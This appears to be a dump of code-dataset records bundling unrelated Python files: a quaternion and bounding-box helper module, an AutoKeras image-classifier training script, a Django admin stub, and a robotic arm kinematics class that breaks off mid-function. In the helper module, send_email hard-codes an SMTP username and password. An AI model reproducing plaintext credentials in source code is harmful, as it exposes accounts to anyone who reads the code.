patch from # Extract image and label # Obtain patch indices into original image # Update patch indices to padded image # # OLD VERSION # # assumed images not to have channel dimension yet and hence adds it # Lookup image and add channel dimension # image_patch = np.expand_dims( # image[patch_index_padded[0, 0]:patch_index_padded[1, 0], # patch_index_padded[0, 1]:patch_index_padded[1, 1], # patch_index_padded[0, 2]:patch_index_padded[1, 2]], # axis=0).astype(np.float32) # Slice image patch # Slice label patch and add dimension # print("image: ", image_patch) # Check that patch has the correct size Given the image shape and the patch shape, calculate the placement of patches. 
If randomize_offset is on, it will randomize the placement, so that the patch boundaries affect different regions in each epoch. There is natural room for this randomization whenever the image size if not divisible by the patch size, in the sense that the overflow can be placed arbitrarily in the beginning on the end. If you want to ensure that some randomization will always occur, you can set minimum_overflow_fraction, which will ensure that an extra patch will be added to provide extra overflow if necessary. :param image_shape: Shape if input image :param patch_shape: Shape of patch :param overlap: Allow patches to overlap with this number of voxels :param randomize_offset: Whether patch placement should be normalized :param minimum_overflow_fraction: Specify to force overflow beyond image to be at least this fraction of the patch size :return: # Effective patch shape # Number of patches (rounding up) # Overflow of voxels beyond image # Add extra patch for dimensions where minimum is below fraction # Select random start index so that overlap is spread randomly # on both sides. If overflow is larger than patch_shape # Set start index to overflow is spread evenly on both sides # In the non-randomize setting, we still one to make sure that the # last patch sticks outside the image with at least overlap/2, i.e, # that overflow/2 > overlap/2 (since the overflow is distributed # evenly on both sides when randomize_offset=True # stop_index = image_shape + start_index + overflow | 2.066897 | 2 |
src/helper/helper.py | JonasFrey96/PLR2 | 0 | 6616722 | <gh_stars>0
import yagmail
from sklearn.neighbors import NearestNeighbors
import yaml
import numpy as np
import collections.abc  # MutableMapping lives in collections.abc (required on Python 3.10+)
import torch
import copy
import random  # needed by generate_unique_idx below
def flatten_list(d, parent_key='', sep='_'):
items = []
for num, element in enumerate(d):
new_key = parent_key + sep + str(num) if parent_key else str(num)
if isinstance(element, collections.abc.MutableMapping):
items.extend(flatten_dict(element, new_key, sep=sep).items())
else:
if isinstance(element, list):
if isinstance(element[0], dict):
items.extend(flatten_list(element, new_key, sep=sep))
continue
items.append((new_key, element))
return items
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
if isinstance(v, list):
if isinstance(v[0], dict):
items.extend(flatten_list(v, new_key, sep=sep))
continue
items.append((new_key, v))
return dict(items)
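# A minimal sketch (hypothetical input): nested dicts/lists are flattened into a single
# level with '_'-joined keys, e.g.
#   flatten_dict({'optim': {'lr': 0.1, 'betas': [0.9, 0.999]}})
#   -> {'optim_lr': 0.1, 'optim_betas': [0.9, 0.999]}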
def norm_quat(q):
# ToDo raise type and dim error
return q / torch.sqrt(torch.sum(q * q))
def pad(s, sym='-', p='l', length=80):
if len(s) > length:
return s
else:
if p == 'c':
front = int((length - len(s)) / 2)
s = sym * front + s
back = int(length - len(s))
s = s + sym * back
if p == 'l':
back = int(length - len(s))
s = s + sym * back
return s
def re_quat(q, input_format):
if input_format == 'xyzw':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[3]
q[3] = q[2]
q[2] = q[1]
q[1] = v0
return q
elif input_format == 'wxyz':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[1]
q[1] = q[2]
q[2] = q[3]
q[3] = v0
return q
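# A minimal sketch of re_quat (example values): passing input_format='xyzw' reorders the
# quaternion in place to wxyz; passing 'wxyz' performs the inverse reordering.
#   q = [0.0, 0.0, 0.7071, 0.7071]   # xyzw, roughly a 90 degree rotation about z
#   re_quat(q, 'xyzw')               # -> [0.7071, 0.0, 0.0, 0.7071] in wxyz order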
def send_email(text):
yag = yagmail.SMTP('trackthisplr', "TrackThis")
contents = [
"Run is finished!",
text
]
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
def compose_quat(p, q, device):
"""
input is wxyz
"""
q = norm_quat(re_quat(q.squeeze(), 'wxyz')).unsqueeze(0)
p = norm_quat(re_quat(p.squeeze(), 'wxyz')).unsqueeze(0)
product = torch.zeros(
(max(p.shape[0], q.shape[0]), 4), dtype=torch.float32, device=device)
product[:, 3] = p[:, 3] * q[:, 3] - torch.sum(p[:, :3] * q[:, :3], (1))
product[:, :3] = (p[:, None, 3] * q[:, :3] + q[:, None, 3] * p[:, :3] +
torch.cross(p[:, :3], q[:, :3]))
return re_quat(product.squeeze(0), 'xyzw')
def rotation_angle(q, device):
# in radians
q = norm_quat(q)
unit_r = torch.t(torch.tensor(
[[0, 0, 0, 1]], dtype=torch.float32, device=device))
return torch.asin(torch.mm(q, unit_r)) * 2
def nearest_neighbor(src, dst):
assert src.shape[1] == dst.shape[1]
neigh = NearestNeighbors(n_neighbors=1, n_jobs=8)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if isinstance(v, dict):
obj[k] = replace_item(v, key, replace_value)
if key in obj:
obj[key] = replace_value
return obj
def generate_unique_idx(num, max_idx):
a = random.sample(range(0, max_idx), k=min(num, max_idx))
while len(a) < num:
a = a + random.sample(
range(0, max_idx), k=min(max_idx, num - len(a)))
return a
def get_bbox_480_640(label):
border_list = [-1, 40, 80, 120, 160, 200, 240, 280,
320, 360, 400, 440, 480, 520, 560, 600, 640, 680]
img_width = 480
img_length = 640
# print(type(label))
rows = np.any(label, axis=1)
cols = np.any(label, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
rmax += 1
cmax += 1
r_b = rmax - rmin
for tt in range(len(border_list)):
if r_b > border_list[tt] and r_b < border_list[tt + 1]:
r_b = border_list[tt + 1]
break
c_b = cmax - cmin
for tt in range(len(border_list)):
if c_b > border_list[tt] and c_b < border_list[tt + 1]:
c_b = border_list[tt + 1]
break
center = [int((rmin + rmax) / 2), int((cmin + cmax) / 2)]
rmin = center[0] - int(r_b / 2)
rmax = center[0] + int(r_b / 2)
cmin = center[1] - int(c_b / 2)
cmax = center[1] + int(c_b / 2)
if rmin < 0:
delt = -rmin
rmin = 0
rmax += delt
if cmin < 0:
delt = -cmin
cmin = 0
cmax += delt
if rmax > img_width:
delt = rmax - img_width
rmax = img_width
rmin -= delt
if cmax > img_length:
delt = cmax - img_length
cmax = img_length
cmin -= delt
return rmin, rmax, cmin, cmax
| import yagmail
from sklearn.neighbors import NearestNeighbors
import yaml
import numpy as np
import collections.abc  # MutableMapping lives in collections.abc (required on Python 3.10+)
import torch
import copy
import random  # needed by generate_unique_idx below
def flatten_list(d, parent_key='', sep='_'):
items = []
for num, element in enumerate(d):
new_key = parent_key + sep + str(num) if parent_key else str(num)
if isinstance(element, collections.abc.MutableMapping):
items.extend(flatten_dict(element, new_key, sep=sep).items())
else:
if isinstance(element, list):
if isinstance(element[0], dict):
items.extend(flatten_list(element, new_key, sep=sep))
continue
items.append((new_key, element))
return items
def flatten_dict(d, parent_key='', sep='_'):
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten_dict(v, new_key, sep=sep).items())
else:
if isinstance(v, list):
if isinstance(v[0], dict):
items.extend(flatten_list(v, new_key, sep=sep))
continue
items.append((new_key, v))
return dict(items)
def norm_quat(q):
# ToDo raise type and dim error
return q / torch.sqrt(torch.sum(q * q))
def pad(s, sym='-', p='l', length=80):
if len(s) > length:
return s
else:
if p == 'c':
front = int((length - len(s)) / 2)
s = sym * front + s
back = int(length - len(s))
s = s + sym * back
if p == 'l':
back = int(length - len(s))
s = s + sym * back
return s
def re_quat(q, input_format):
if input_format == 'xyzw':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[3]
q[3] = q[2]
q[2] = q[1]
q[1] = v0
return q
elif input_format == 'wxyz':
if isinstance(q, torch.Tensor):
v0 = q[0].clone()
else:
v0 = copy.deepcopy(q[0])
q[0] = q[1]
q[1] = q[2]
q[2] = q[3]
q[3] = v0
return q
def send_email(text):
yag = yagmail.SMTP('trackthisplr', "TrackThis")
contents = [
"Run is finished!",
text
]
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
yag.send('<EMAIL>',
'PLR - TrackThis - Lagopus', contents)
def compose_quat(p, q, device):
"""
input is wxyz
"""
q = norm_quat(re_quat(q.squeeze(), 'wxyz')).unsqueeze(0)
p = norm_quat(re_quat(p.squeeze(), 'wxyz')).unsqueeze(0)
product = torch.zeros(
(max(p.shape[0], q.shape[0]), 4), dtype=torch.float32, device=device)
product[:, 3] = p[:, 3] * q[:, 3] - torch.sum(p[:, :3] * q[:, :3], (1))
product[:, :3] = (p[:, None, 3] * q[:, :3] + q[:, None, 3] * p[:, :3] +
torch.cross(p[:, :3], q[:, :3]))
return re_quat(product.squeeze(0), 'xyzw')
def rotation_angle(q, device):
# in radians
q = norm_quat(q)
unit_r = torch.t(torch.tensor(
[[0, 0, 0, 1]], dtype=torch.float32, device=device))
return torch.asin(torch.mm(q, unit_r)) * 2
def nearest_neighbor(src, dst):
assert src.shape[1] == dst.shape[1]
neigh = NearestNeighbors(n_neighbors=1, n_jobs=8)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
def replace_item(obj, key, replace_value):
for k, v in obj.items():
if isinstance(v, dict):
obj[k] = replace_item(v, key, replace_value)
if key in obj:
obj[key] = replace_value
return obj
def generate_unique_idx(num, max_idx):
a = random.sample(range(0, max_idx), k=min(num, max_idx))
while len(a) < num:
a = a + random.sample(
range(0, max_idx), k=min(max_idx, num - len(a)))
return a
def get_bbox_480_640(label):
border_list = [-1, 40, 80, 120, 160, 200, 240, 280,
320, 360, 400, 440, 480, 520, 560, 600, 640, 680]
img_width = 480
img_length = 640
# print(type(label))
rows = np.any(label, axis=1)
cols = np.any(label, axis=0)
rmin, rmax = np.where(rows)[0][[0, -1]]
cmin, cmax = np.where(cols)[0][[0, -1]]
rmax += 1
cmax += 1
r_b = rmax - rmin
for tt in range(len(border_list)):
if r_b > border_list[tt] and r_b < border_list[tt + 1]:
r_b = border_list[tt + 1]
break
c_b = cmax - cmin
for tt in range(len(border_list)):
if c_b > border_list[tt] and c_b < border_list[tt + 1]:
c_b = border_list[tt + 1]
break
center = [int((rmin + rmax) / 2), int((cmin + cmax) / 2)]
rmin = center[0] - int(r_b / 2)
rmax = center[0] + int(r_b / 2)
cmin = center[1] - int(c_b / 2)
cmax = center[1] + int(c_b / 2)
if rmin < 0:
delt = -rmin
rmin = 0
rmax += delt
if cmin < 0:
delt = -cmin
cmin = 0
cmax += delt
if rmax > img_width:
delt = rmax - img_width
rmax = img_width
rmin -= delt
if cmax > img_length:
delt = cmax - img_length
cmax = img_length
cmin -= delt
return rmin, rmax, cmin, cmax | en | 0.550011 | # ToDo raise type and dim error input is wxyz # in radians # print(type(label)) | 2.383941 | 2 |
auto-keras-patches.py | alievilya/nni-patches | 0 | 6616723 | import numpy as np
import tensorflow as tf
from tensorflow.keras.datasets import mnist
import autokeras as ak
import numpy as np
import os
import cv2
import json
from os.path import isfile, join
from sklearn.model_selection import train_test_split
# TODO: argparse
def load_images(file_path, size=120, is_train=True):
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/labels.json', 'r') as fp:
labels_dict = json.load(fp)
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/encoded_labels.json', 'r') as fp:
encoded_labels = json.load(fp)
Xarr = []
Yarr = []
number_of_classes = 3
files = [f for f in os.listdir(file_path) if isfile(join(file_path, f))]
files.sort()
for filename in files:
image = cv2.imread(join(file_path, filename))
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.resize(image, (size, size))
Xarr.append(image)
label_names = labels_dict[filename[:-4]]
each_file_labels = [0 for _ in range(number_of_classes)]
for name in label_names:
num_label = encoded_labels[name]
# each_file_labels.append(num_label)
each_file_labels[num_label] = 1
Yarr.append(each_file_labels)
Xarr = np.array(Xarr)
Yarr = np.array(Yarr)
# Xarr = Xarr.reshape(-1, size, size, 1)
return Xarr, Yarr
def load_patches(file_path='X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/Generated_dataset'):
Xtrain, Ytrain = load_images(file_path, size=120, is_train=True)
new_Ytrain = []
for y in Ytrain:
ys = np.argmax(y)
new_Ytrain.append(ys)
new_Ytrain = np.array(new_Ytrain)
Xtrain, Xval, Ytrain, Yval = train_test_split(Xtrain, new_Ytrain, random_state=1, train_size=0.8)
return (Xtrain, Ytrain), (Xval, Yval)
(x_train, y_train), (x_test, y_test) = load_patches()
x_train, x_test = x_train / 255.0, x_test / 255.0
#
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
# print(x_train.shape) # (60000, 28, 28)
print(y_train.shape) # (60000,)
print(y_train[:3]) # array([7, 2, 1], dtype=uint8)
# # Initialize the image classifier.
# clf = ak.ImageClassifier(overwrite=True, max_trials=1)
# # Feed the image classifier with training data.
# clf.fit(x_train, y_train, epochs=10)
#
#
# # Predict with the best model.
# predicted_y = clf.predict(x_test)
# print(predicted_y)
#
#
# # Evaluate the best model with testing data.
# print(clf.evaluate(x_test, y_test))
clf = ak.ImageClassifier(
num_classes=3,
multi_label=False,
loss=None,
metrics=None,
max_trials=5,
directory=None,
objective="val_loss",
overwrite=False
)
# input_node = ak.ImageInput()
# output_node = ak.Normalization()(input_node)
# output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node)
# output_node = ak.ResNetBlock(version="v2")(output_node)
# output_node = ak.ClassificationHead()(output_node)
# clf = ak.AutoModel(
# inputs=input_node, outputs=output_node, overwrite=True, max_trials=1
# )
clf.fit(
x_train,
y_train,
# Split the training data and use the last 20% as validation data.
validation_split=0.2,
epochs=10,
)
# Predict with the best model.
predicted_y = clf.predict(x_test)
print(predicted_y)
# Evaluate the best model with testing data.
print(clf.evaluate(x_test, y_test))
# get the best performing model
model = clf.export_model()
# summarize the loaded model
model.summary()
# save the best performing model to file
model.save('model_autokeras.h5') | import numpy as np
import tensorflow as tf
from tensorflow.keras.datasets import mnist
import autokeras as ak
import numpy as np
import os
import cv2
import json
from os.path import isfile, join
from sklearn.model_selection import train_test_split
# TODO: argparse
def load_images(file_path, size=120, is_train=True):
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/labels.json', 'r') as fp:
labels_dict = json.load(fp)
with open('X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/dataset_files/encoded_labels.json', 'r') as fp:
encoded_labels = json.load(fp)
Xarr = []
Yarr = []
number_of_classes = 3
files = [f for f in os.listdir(file_path) if isfile(join(file_path, f))]
files.sort()
for filename in files:
image = cv2.imread(join(file_path, filename))
# image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = cv2.resize(image, (size, size))
Xarr.append(image)
label_names = labels_dict[filename[:-4]]
each_file_labels = [0 for _ in range(number_of_classes)]
for name in label_names:
num_label = encoded_labels[name]
# each_file_labels.append(num_label)
each_file_labels[num_label] = 1
Yarr.append(each_file_labels)
Xarr = np.array(Xarr)
Yarr = np.array(Yarr)
# Xarr = Xarr.reshape(-1, size, size, 1)
return Xarr, Yarr
def load_patches(file_path='X:/code/Maga_Nir/frameworks_for_paper/nni-patches/nni/Generated_dataset'):
Xtrain, Ytrain = load_images(file_path, size=120, is_train=True)
new_Ytrain = []
for y in Ytrain:
ys = np.argmax(y)
new_Ytrain.append(ys)
new_Ytrain = np.array(new_Ytrain)
Xtrain, Xval, Ytrain, Yval = train_test_split(Xtrain, new_Ytrain, random_state=1, train_size=0.8)
return (Xtrain, Ytrain), (Xval, Yval)
(x_train, y_train), (x_test, y_test) = load_patches()
x_train, x_test = x_train / 255.0, x_test / 255.0
#
# (x_train, y_train), (x_test, y_test) = mnist.load_data()
# print(x_train.shape) # (60000, 28, 28)
print(y_train.shape) # (60000,)
print(y_train[:3]) # array([7, 2, 1], dtype=uint8)
# # Initialize the image classifier.
# clf = ak.ImageClassifier(overwrite=True, max_trials=1)
# # Feed the image classifier with training data.
# clf.fit(x_train, y_train, epochs=10)
#
#
# # Predict with the best model.
# predicted_y = clf.predict(x_test)
# print(predicted_y)
#
#
# # Evaluate the best model with testing data.
# print(clf.evaluate(x_test, y_test))
clf = ak.ImageClassifier(
num_classes=3,
multi_label=False,
loss=None,
metrics=None,
max_trials=5,
directory=None,
objective="val_loss",
overwrite=False
)
# input_node = ak.ImageInput()
# output_node = ak.Normalization()(input_node)
# output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node)
# output_node = ak.ResNetBlock(version="v2")(output_node)
# output_node = ak.ClassificationHead()(output_node)
# clf = ak.AutoModel(
# inputs=input_node, outputs=output_node, overwrite=True, max_trials=1
# )
clf.fit(
x_train,
y_train,
# Split the training data and use the last 20% as validation data.
validation_split=0.2,
epochs=10,
)
# Predict with the best model.
predicted_y = clf.predict(x_test)
print(predicted_y)
# Evaluate the best model with testing data.
print(clf.evaluate(x_test, y_test))
# get the best performing model
model = clf.export_model()
# summarize the loaded model
model.summary()
# save the best performing model to file
model.save('model_autokeras.h5') | en | 0.463836 | # TODO: argparse # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # each_file_labels.append(num_label) # Xarr = Xarr.reshape(-1, size, size, 1) # # (x_train, y_train), (x_test, y_test) = mnist.load_data() # print(x_train.shape) # (60000, 28, 28) # (60000,) # array([7, 2, 1], dtype=uint8) # # Initialize the image classifier. # clf = ak.ImageClassifier(overwrite=True, max_trials=1) # # Feed the image classifier with training data. # clf.fit(x_train, y_train, epochs=10) # # # # Predict with the best model. # predicted_y = clf.predict(x_test) # print(predicted_y) # # # # Evaluate the best model with testing data. # print(clf.evaluate(x_test, y_test)) # input_node = ak.ImageInput() # output_node = ak.Normalization()(input_node) # output_node = ak.ImageAugmentation(horizontal_flip=False)(output_node) # output_node = ak.ResNetBlock(version="v2")(output_node) # output_node = ak.ClassificationHead()(output_node) # clf = ak.AutoModel( # inputs=input_node, outputs=output_node, overwrite=True, max_trials=1 # ) # Split the training data and use the last 15% as validation data. # Predict with the best model. # Evaluate the best model with testing data. # get the best performing model # summarize the loaded model # save the best performing model to file | 2.529366 | 3 |
django-rgd-geometry/rgd_geometry/admin/__init__.py | ResonantGeoData/ResonantGeoData | 40 | 6616724 | <filename>django-rgd-geometry/rgd_geometry/admin/__init__.py
from .geometry import * # noqa
| <filename>django-rgd-geometry/rgd_geometry/admin/__init__.py
from .geometry import * # noqa
| none | 1 | 1.071461 | 1 | |
t_system/motion/arm/__init__.py | sevgiun/T_System | 7 | 6616725 | <reponame>sevgiun/T_System
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: arm
:platform: Unix
:synopsis: the top-level submodule of T_System that contains the classes related to T_System's motion ability.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
import numpy as np
import json
import threading
from numpy import linalg
from sympy import symbols, eye, Matrix, cos, sin, diff
from math import pi
from multipledispatch import dispatch
from t_system.motion.arm.modelisation import ArmModeler
from t_system.motion.motor import ServoMotor, ExtServoMotor
from t_system.motion import degree_to_radian, radian_to_degree
from t_system import T_SYSTEM_PATH
from t_system import log_manager
logger = log_manager.get_logger(__name__, "DEBUG")
class Joint:
"""Class to define the joint of N-axis motion arm.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, joint, use_ext_driver=None):
"""Initialization method of :class:`t_system.motion.arm.Joint` class.
Args:
joint (dict): The requested_data that is contain joint's properties from the config file.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.number = joint['joint_number']
self.is_reverse = joint['reverse']
self.motor = None
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = None
self.structure = joint['structure']
self.rotation_type = joint['rotation_type']
if self.structure == 'revolute':
self.max_q = joint['max_q']
self.min_q = joint['min_q']
elif self.structure == 'prismatic':
self.max_d = joint['max_d']
self.min_d = joint['min_d']
self.d = joint['init_d']
self.q = joint['init_q']
self.a = joint['a']
self.alpha = joint['alpha']
self.use_ext_driver = use_ext_driver
self.current_angle = degree_to_radian(self.q)
if self.is_reverse:
self.current_angle = pi - self.current_angle
if self.structure != 'constant':
if self.use_ext_driver:
self.motor = ExtServoMotor(joint['channel'])
self.motor.start(round(self.current_angle, 4))
else:
self.motor = ServoMotor(joint['motor_gpio_pin'])
self.motor.start(round(self.current_angle, 4))
self.motor_thread_stop = None
self.motor_thread_direction = None
self.motor_thread = threading.Thread(target=self.motor.change_position_incregular, args=(lambda: self.motor_thread_stop, lambda: self.motor_thread_direction))
logger.info(f'Joint{self.number} started successfully. As {self.structure}, in {self.rotation_type} rotation type, on {round(self.current_angle,4)} radian.')
@dispatch(float)
def move_to_angle(self, target_angle):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
"""
self.motor.directly_goto_position(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float)
def move_to_angle(self, target_angle, divide_count, delay):
"""The top-level method to provide servo motors moving.
Args:
target_angle (float): The target angle of servo motors. In radian Unit.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
"""
self.motor.softly_goto_position(target_angle, divide_count, delay)
self.current_angle = target_angle
@dispatch(float, bool)
def change_angle_by(self, delta_angle, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle)
self.current_angle = target_angle
@dispatch(float, int, float, bool)
def change_angle_by(self, delta_angle, divide_count, delay, direction):
"""The top-level method to provide servo motors moving.
Args:
delta_angle (float): Angle to rotate. In degree.
divide_count (int): The count that specify motor how many steps will use.
delay (float): delay time between motor steps.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
target_angle = round(self.__calc_target_angle(degree_to_radian(delta_angle), direction), 5)
self.move_to_angle(target_angle, divide_count, delay)
self.current_angle = target_angle
def __calc_target_angle(self, delta_angle, direction):
"""Method to calculate target angle with the given variation angle value.
Args:
delta_angle (float): Calculated theta angle for going to object position. In radian type.
direction (bool): Rotate direction. True means CW, otherwise CCW.
"""
if self.is_reverse:
direction = not direction
if direction:
if self.current_angle - delta_angle < 0 or self.current_angle - delta_angle > pi:
return self.current_angle
return self.current_angle - delta_angle # this mines (-) for cw.
else:
if self.current_angle + delta_angle < 0 or self.current_angle + delta_angle > pi:
return self.current_angle
return self.current_angle + delta_angle
def stop(self):
"""Method to provide stop the GPIO.PWM services that are reserved for the joint's servo motor.
"""
self.motor.stop()
def gpio_cleanup(self):
"""Method to provide clean the GPIO pins that are reserved for the collimator's servo motor.
"""
self.motor.gpio_cleanup()
class Arm:
"""Class to define a N-axis arm for motion ability of tracking system.
This class provides necessary initiations and a function named :func:`t_system.motor.Motor.move`
for the provide move of servo motor.
"""
def __init__(self, arm_name="Junior", use_ext_driver=False):
"""Initialization method of :class:`t_system.motion.arm.Arm` class.
Args:
arm_name (str): Name of the arm. From config file or user choice.
use_ext_driver (bool): The flag of external PWM driver activation.
"""
self.name = arm_name
self.expansion_name = f'{self.name}-Expansion'
self.__is_expanded = False
self.joints = []
self.config_file = f'{T_SYSTEM_PATH}/motion/arm/config.json'
self.joint_count = 0
self.alpha = None
self.a = None
self.q = None
self.d = None
self.dh_params = {}
self.tf_matrices_list = []
self.jacobian_matrix = None
self.current_pos_as_coord = []
self.current_pos_as_theta = []
with open(self.config_file) as conf_file:
arm_configs = json.load(conf_file)[self.name] # config file returns the arms.
self.use_ext_driver = use_ext_driver
if self.use_ext_driver:
self.use_ext_driver = arm_configs["use_ext_driver"]
self.__set_joints(arm_configs["joints"])
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
logger.info(f'{self.name} arm started successfully.')
def expand(self, current_angles=None):
"""Method to expand arm with using target_locker of t_system's vision.
Args:
current_angles (list): Current angles of the arm's expanded joints.
"""
if not self.__is_expanded:
try:
self.__is_expanded = True
self.joints.pop(-1)
with open(self.config_file) as conf_file:
expansion_joint_configs = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for (i, joint_conf) in enumerate(expansion_joint_configs):
joint_conf['joint_number'] = len(self.joints) + 1
if current_angles and (joint_conf['structure'] != "constant"):
joint_conf['init_q'] = radian_to_degree(current_angles[i])
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
self.__is_expanded = False
def revert_the_expand(self):
"""Method to revert back the expansion.
"""
released_angles = []
if self.__is_expanded:
try:
self.__is_expanded = False
with open(self.config_file) as conf_file:
expansion_joints = json.load(conf_file)[self.expansion_name] # config file returns the arms.
for joint in expansion_joints:
if self.joints[-1].structure != "constant":
self.joints[-1].stop()
self.joints[-1].gpio_cleanup()
released_angles.append(self.current_pos_as_theta[-1])
del self.current_pos_as_theta[-1]
del self.joints[-1]
with open(self.config_file) as conf_file:
arm = json.load(conf_file)[self.name] # config file returns the arms.
self.joints.append(Joint(arm["joints"][-1], self.use_ext_driver))
self.joint_count = len(self.joints)
self.__prepare_dh_params()
self.__set_dh_params(self.joints)
# self.current_pos_as_coord = self.get_coords_from_forward_kinematics(self.__forward_kinematics(self.current_pos_as_theta)[-1])
except Exception as e:
logger.warning(f'{e}')
released_angles = [None, None]
self.__is_expanded = True
return released_angles
def is_expanded(self):
"""Method to return expansion flag of the arm.
"""
return self.__is_expanded
def __set_joints(self, joint_configs):
"""Method to setting joints with D-H parameters.
Args:
joint_configs (list): The joint list from the config file.
"""
self.joint_count = len(joint_configs)
for joint_conf in joint_configs:
joint = Joint(joint_conf, self.use_ext_driver)
self.joints.append(joint)
if joint.structure != "constant":
self.current_pos_as_theta.append(joint.current_angle)
self.__prepare_dh_params()
def __pull_model(self):
"""Method to pull arm D-H model from database via an ArmModeller instance.
"""
model = ArmModeler().get(self.name)
if model:
logger.debug("model creating...")
self.alpha = model["alpha"]
self.a = model["a"]
self.q = model["q"]
self.d = model["d"]
self.dh_params = model["dh_params"]
self.tf_matrices_list = model["transform_matrices"]
self.jacobian_matrix = model["jacobian_matrix"]
else:
ArmModeler().create(self.name)
self.__pull_model()
def __prepare_dh_params(self):
"""Method to preparing D-H parameters of Arm.
"""
self.alpha = symbols('alpha0:' + str(self.joint_count))
self.a = symbols('a0:' + str(self.joint_count))
self.q = symbols('q1:' + str(self.joint_count + 1))
self.d = symbols('d1:' + str(self.joint_count + 1))
def __set_dh_params(self, joints):
"""Method to setting joint's D-H parameters.
Args:
joints (list): The arm's joints list for preparing parameters of Denavit-Hartenberg chart.
"""
self.dh_params = {}
for i in range(len(joints)):
self.dh_params[self.alpha[i]] = joints[i].alpha
self.dh_params[self.a[i]] = joints[i].a
if joints[i].structure == 'revolute':
self.dh_params[self.q[i]] = self.q[i]
self.dh_params[self.d[i]] = joints[i].d
elif joints[i].structure == 'prismatic':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = self.d[i]
elif joints[i].structure == 'constant':
self.dh_params[self.q[i]] = joints[i].q
self.dh_params[self.d[i]] = joints[i].d
self.__set_transform_matrices()
def show_dh_params(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'DH Parameters are: {self.dh_params}')
def __set_transform_matrices(self):
"""Method to setting D-H transform matrices.
"""
self.tf_matrices_list = []
transform_matrix = eye(4) # creates a unit matrix via passing argument.
for i in range(self.joint_count):
transform_matrix = transform_matrix * self.__create_tf_matrix(self.alpha[i], self.a[i], self.d[i], self.q[i]).subs(self.dh_params)
self.tf_matrices_list.append(transform_matrix)
def show_transform_matrices(self):
"""Method to getting D-H parameters of joints of Arm as string message.
"""
print(f'Transform Matrices are: {self.tf_matrices_list}')
@staticmethod
def __create_tf_matrix(alpha, a, d, q):
"""Method to calculate transform matrix of Denavit-Hartenberg Method.
Args:
alpha: The twist angle. Axis angle between consecutive two axes.
a: The limb length between consecutive two axis.
d: link offset. The displacement along the same axis.
q: The rotation theta angle about the joint axis.
Returns:
object: The Denavit-Hartenberg transform matrix object.
"""
tf_matrix = Matrix([[cos(q), -sin(q), 0., a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0., 0., 0., 1.]])
return tf_matrix
@staticmethod
def get_coords_from_forward_kinematics(forward_kinematics_result):
"""Method to get cartesian coords from calculated forward kinematics result of the Arm.
Args:
forward_kinematics_result (list): result of the forward kinematics calculation.
Returns:
list: The cartesian coordinate position of Arm's farthest point as millimeter list.
"""
return [current_pos[0] for current_pos in forward_kinematics_result]
def __forward_kinematics(self, theta_list):
"""Method to calculate forward kinematics of the Arm.
Args:
theta_list (list): The list of current joints angles.
Returns:
list: The cartesian coordinate position of Arm's farthest point as theta list.
"""
to_current_pos = []
theta_dict = {}
tf_matrix_first_to_last = self.tf_matrices_list[-1]
for i in range(len(theta_list)):
theta_dict[self.q[i]] = theta_list[i]
